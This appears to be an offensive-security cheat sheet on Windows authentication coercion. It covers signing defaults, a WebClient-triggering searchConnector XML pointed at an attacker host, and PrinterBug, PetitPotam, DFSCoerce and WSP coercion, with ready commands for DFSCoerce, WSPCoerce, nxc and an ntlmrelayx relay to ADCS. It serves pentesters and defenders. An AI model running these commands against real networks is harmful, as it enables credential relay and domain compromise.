Internal - Coerce
Coerce refers to forcing a target machine (usually with SYSTEM privileges) to authenticate to another machine.
Signing
Server Side Signing
| Operating System | SMB Signing | LDAP Signing |
|---|---|---|
| Windows Server 2019 DC | ✅ | ❌ |
| Windows Server 2022 DC pre 23H2 | ✅ | ❌ |
| Windows Server 2022 DC 23H2 | ✅ | ✅ |
| Windows Server 2025 DC | ✅ | ✅ |
| Windows Server 2019 Member | ❌ | - |
| Windows Server 2022 Member | ❌ | - |
| Windows Server 2025 Member | ❌ | - |
| Windows 10 | ❌ | - |
| Windows 11 23H2 | ❌ | - |
| Windows 11 24H2 | ✅ | - |
- Server-side SMB signing has been enabled on domain controllers
- Server-side SMB signing is still not required by default on non-DC Windows server
WebClient Service
- On Windows workstations, the WebClient service is installed by default.
- On Windows servers, it is not installed by default
Enable WebClient:
WebClient service can be enabled on the machine using several techniques:
- Mapping a WebDav server using
netcommand :net use ... - Typing anything into the explorer address bar that isn't a local file or directory
-
Browsing to a directory or share that has a file with a
.searchConnector-msextension located inside.<?xml version="1.0" encoding="UTF-8"?> <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector"> <description>Microsoft Outlook</description> <isSearchOnlyItem>false</isSearchOnlyItem> <includeInStartMenuScope>true</includeInStartMenuScope> <templateInfo> <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> </templateInfo> <simpleLocation> <url>http://attacksystem/path</url> </simpleLocation> </searchConnectorDescription>
Check if the WebDav service is running
MS-RPRN - PrinterBug
Tools:
- leechristensen/SpoolSample - PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface.
Examples:
Checking if the Spooler Service is running.
MS-EFSR - PetitPotam
The tools use the LSARPC named pipe with interface c681d488-d850-11d0-8c52-00c04fd90f7e because it's more prevalent. But it's possible to trigger with the EFSRPC named pipe and interface df1941c5-fe89-4e79-bf10-463657acf44d.
Tools:
- topotam/PetitPotam - PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.
Examples:
MS-DFSNM - DFS Coercion
DFS Coerce (MS-DFSNM abuse) is a technique to force a Windows system to authenticate to an attacker-controlled machine by abusing the DFS Namespace Management RPC interface.
Tools:
- Wh04m1001/DFSCoerce - PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.
Examples:
python3 dfscoerce.py -u username -d domain.local 10.10.10.10 10.10.10.11
poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=DFSCoerce
MS-WSP - WSP Coercion
- The
wsearchservice is only enabled by default on workstations, and has been disabled on servers since Server 2016. - Only SMB connections can be coerced with WSP.
Tools:
- slemire/WSPCoerce - PoC to coerce authentication from Windows hosts using MS-WSP.
- RedTeamPentesting/wspcoerce - wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP.
Examples:
WSPCoerce.exe <target> <listener>
WSPCoerce.exe labsw1 172.23.10.109
WSPCoerce.exe labsw1 labsrv1
wspcoerce 'lab.redteam/rtpttest:test1234!@192.0.2.115' "file:////attacksystem/share"
ntlmrelayx.py -t "http://192.0.2.5/certsrv/" -debug -6 -smb2support --adcs
- Can't use an IP address for the target, use a short hostname only (no FQDN)
- Make sure to use a hostname or FQDN for the listener if you want to receive Kerberos auth